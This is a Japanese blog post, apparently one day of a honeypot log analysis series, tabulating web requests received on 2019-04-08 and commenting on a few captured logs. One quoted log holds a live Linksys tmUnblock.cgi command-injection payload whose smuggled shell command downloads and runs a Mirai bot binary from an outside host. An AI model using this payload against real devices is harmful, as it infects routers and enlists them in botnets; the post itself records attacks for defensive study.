honeypotの簡易解析8日目

honeypot

ipアドレスの種類が多かったので、csvを作成するスクリプトを作成しました。もうちょっと作り込んだら公開します。

wordpressの表は使いにくい・・

2019-04-08のアクセス数は360件でした。

■送信元IPアドレスの数は 122件です。

■メソッドの種別は以下です。

method総数 – method
GET168
HEAD1
POST191
合計 結果360

■アクセス統計

pathmethod総数 – path
/ GET44
///?author=1GET1
///wp-json/wp/v2/users/GET1
//db/scripts/setup.phpGET1
//dbadmin/scripts/setup.phpGET1
//ldskflksGET1
//MyAdmin/scripts/setup.phpGET3
//mysql/scripts/setup.phpGET2
//phpMyAdmin-2.11.11.3/scripts/setup.phpGET1
//phpMyAdmin-2.11.11/scripts/setup.phpGET1
//phpMyAdmin-3.0.0.0-all-languages/scripts/setup.phpGET1
//phpmyadmin/scripts/setup.phpGET2
//phpmyadmin3/scripts/setup.phpGET1
//phpmyadmin5/scripts/setup.phpGET1
//phpmyadmin7/scripts/setup.phpGET1
//pma/scripts/setup.phpGET2
//scripts/setup.phpGET1
/favicon.icoGET2
/robots.txtGET1
/robots.txtHEAD1
/stalker_portal/LICENSEGET1
/tmUnblock.cgiPOST4
/wp-login.phpGET59
/wp-login.phpPOST57
/wp//?author=1GET1
/wp//wp-json/wp/v2/users/GET1
/wp/wp-login.phpGET37
/wp/wp-login.phpPOST36
/wp/xmlrpc.phpPOST36
/xmlrpc.phpPOST58
http://112.35.53.83:8088/index.phpGET1

気になるlog

1~4件目。Linksysの脆弱性からのダウンロード

[2019-04-08 00:50:39+0900] 181.221.39.59 192.168.0.14:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False 
POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl.bot%3B+wget+http%3A%2F%2Flove.thotiana.live%2Fbins%2Fmpsl.bot%3B+chmod+777+mpsl.bot%3B+.%2Fmpsl.bot+s1%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

本日もmiraiのダウンロードが来ていました。

23件目。

[2019-04-08 08:47:17+0900] 178.33.77.157 ほげ:80 "な HTTP/1.1" 200 False 
GET //ldskflks HTTP/1.1
Host: ほげ:80
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept-Encoding: gzip
Connection: close

ldskflks が何か特定できなかった。

検索すると公開されている?webサーバのアクセスログが検索できて面白い。w